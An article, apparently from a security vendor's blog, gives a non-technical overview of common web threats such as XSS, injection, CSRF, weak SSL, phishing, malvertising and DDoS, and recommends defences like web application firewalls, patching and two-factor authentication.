The Whys and Wherefores of Web Security

Since the advent of the Internet, cybersecurity has been handed new challenges due to the massively expanded accessibility and interconnectedness of the web. Where once security was considered to be dealt with in a multi-layered manner, now those layers are so fuzzy and expanded as to no longer exist.

Download the summary here

Web security extends outwards, from the browser across webservers and into web API based applications and then back again – we have created a universe of free-flowing data that needs a multitude of controls to protect data, systems and human beings.

Websites and browsers can be like an open door to cybercriminals, who exploit vulnerabilities within the software to insert malicious code or to take websites down. I’ll expand on some of the more common threats to our web health and discuss the implications and the resolutions to each.

Software Vulnerabilities

The software involved in creating a website and the extended web services needed to interconnect across the Internet, are all open to exploit through vulnerabilities in the underlying code. In addition, the advent of content management systems like WordPress and Joomla and their expanded application environment through modules, plug-ins and themes, have allowed a number of entry points that impact web security.

One of the most common attack types is a Cross Site Scripting or XSS attack. XSS attacks are a type of injection attack. They allow a hacker to ‘inject’ a piece of JavaScript into a legitimate web application – the application is then told to present illegitimate content when a user accesses it. CMS community code, such as plug-ins, is a notorious vector for XSS. If an XSS attack plays out, it can compromise a user’s account on a website by hijacking a user’s web session and their cookies. Jetpack, one of WordPress’s most popular plug-ins had a XSS vulnerability which affected their one million users.

Software vulnerabilities are present in pretty much all software code. But certain practises can minimise the impact. Good secure coding practises can remove many potential areas of exploitation and the Open Web Application Security Program OWASP has an excellent guide on this topic. Use of a Web Application Firewall (WAF) is another way of helping to minimise the risk of XSS attacks. Also, making sure software is promptly patched when a new release is approved, is a fundamental part of creating a secure web.

Database Injection Attacks

Data drives the Internet and it is the biggest risk factor, as cybercriminals are increasingly after Personally Identifiable Information (Pii) as exemplified with the highest ever number of data breaches in U.S. history in 2014 which was an increase of 27.5% over 2013.

Cybercriminals look at all aspects of web security to find a way in. One of these is via the database that stores data and also login credentials for user accounts. Databases are the underpinning technology of the Internet. It is where everything is stored in one form or another.

Whether you are using a SQL (e.g. MS SQL) or NoSQL (e.g. MongoDB) database you are at risk of an injection attack. Injection attacks happen when data is input and not filtered. So a cybercriminal can therefore exploit poorly filtered form fields on a website and use them to inject malicious code into a database, the result usually being that the content of the database is dumped to the awaiting hacker. Remediation of injection attacks is to use special secure coding practices or to deploy a WAF.

Database Exploitation

The storage of data within a web context is also an area that can be misconfigured at the cost of user data. PCI compliance is one area that has been developed to attempt to address the past misdemeanours in the storage of financial details. However, this wasn’t enough for JPMorgan Chase, who in 2014 had 83 million customer accounts exposed because of a breach involving poorly implemented server authentication (see section on Web Access Controls and the Human Factor). In fact the PCI Security Standards Council has now recommended the use of a WAF to harden web applications against this type of attack. Database security is a whole area of discussion in its own right, but strong, two-factor authentication and a deep understanding of how database encryption is correctly used, is an integral part of that discussion.

Poorly Implemented SSL

Most website implementations that need to handle sensitive data, such as login credentials and personal data, are configured to use the security standard protocol known as Secure Sockets Layer (SSL ) or its successor Transport Layer Security (TLS) to create an HTTPS based, a secure internet connection. The problem is that the protocol can be misconfigured during implementation and therefore be easily hacked; for example delivering the login page without SSL. A number of Wi-Fi hacking devices are now cheaply available. Devices such as Wi-Fi Pineapple, which is a legitimate PEN testing tool, can be used to hack into poorly configured SSL services grabbing user credentials and accessing user accounts.

Cross Site Request Forgery

Cross Site Request Forgery or CSRF is a common way that cybercriminals attack web security. CSRF is presented as a FORM POST into a website. So, for example, a user could have navigated to a spoof site which contains the CSRF exploit. They then open a legitimate site, say an ecommerce site where they have an account. Because the ecommerce site is open in the same browser session, the spoof site is able to POST its CSRF attack via the user’s browser, into the back end of the web application the user is connected to. The hacker can then do all sorts of things, including transferring money across to their own bank account.

Thankfully, there are ways of preventing this type of attack; this includes the use of captchas or hidden tokens in the web application or with the help of a WAF, and at the front educating users about the risks.

Web Access Controls and the Human Factor

Access control to a user’s account on a web application is an area which is evolving. Password fatigue is hitting at the same time that cybercrime and identity theft are soaring.

If you analyse some of the largest breaches in the last two years, you will find that stolen credentials are the starting point for a cyber-attack. In fact, according to several studies, including the Verizon Data Breach Investigations Report, up to 80% of breaches can be attributed to stolen credentials and stolen credentials play a major part in lost data including financial information. And often these credentials are stolen using web based attack vectors. Because of the openness and accessibility of the internet, human touchpoints have really taken off. It is almost as if everyone is an ‘insider threat’. Social engineering is something that has reared its head in recent years with the advent of phishing and spear phishing and the associated spoof websites. Socially engineered hacks are arguably the most difficult to deal with as they involve human behaviour. Spear phishing, in particular, is highly successful. Security firm, FireEye in a 2014 report on Spear Phishing Attacks, found that spear phishing emails had a 70% open rate and of that 50% of the users clicked through to a spoof website. The use of second-factor authentication is one area that can help to alleviate the risks associated with stolen credentials.

Malvertising

Malvertising is the new kid on the block of cyber threats. This is where cybercriminals use online ads to infect the machines of site visitors via their browser.  Malvertising is become an increasing threat. Google had to remove 350 million ‘bad ads’ from their DoubleClick network last year – many of them serving up one of the most sinister forms of malware, ransomware, which extorts up to $1000 from infected users.

DOS Attacks

Denial of Service, DOS or Distributed Denial of Service DDoS attacks are where an attacker floods a website/applications bandwidth thereby making the service unavailable. The latter method, DDoS uses a method called a ‘Botnet’. This is a piece of malware that has previously been (surreptitiously) installed on many users PC’s. A ‘Botnet Herder’ then executes this malware to flood a specific website, effectively disabling the service so the site can’t operate. It was used as an effective method by hactivists, including the Chinese government against the U.S. government and is now being used as a smoke screen allowing cybercriminals to insert malware into an organization while they are busy trying to rectify the DDoS attack.

Meeting the Web Security Challenge

The Internet has given us incredible freedom of communication and access to many types of services. With every great innovation come challenges and web security is one of those. The distributed nature of the Internet also means we need to be more innovative about how we protect those distributed resources. Correct implementation of web applications and their extended hosting infrastructure will help to protect data, both stored and in transit. Applying the correct tools, such as Web Application Firewalls, allow us to combat the challenges presented by modern web hacking techniques, which take advantage of the very nature of the Internet, i.e. its openness and connectivity. Knowledge and understanding of where the issues lie with regards to web security and how cybercriminals make use of vulnerabilities, helps us to formulate a robust security strategy. The use of the correct implementation standards and the right tools, allows us to make sure that our web sites and services are secure and data security and privacy is upheld.

Get the slideshare version

Author Details

Mathias Wyss

Mathias Wyss

Product Manager Web Access Management & Security Expert @ United Security Providers, MSc ETH, CISSP

Leave A Comment?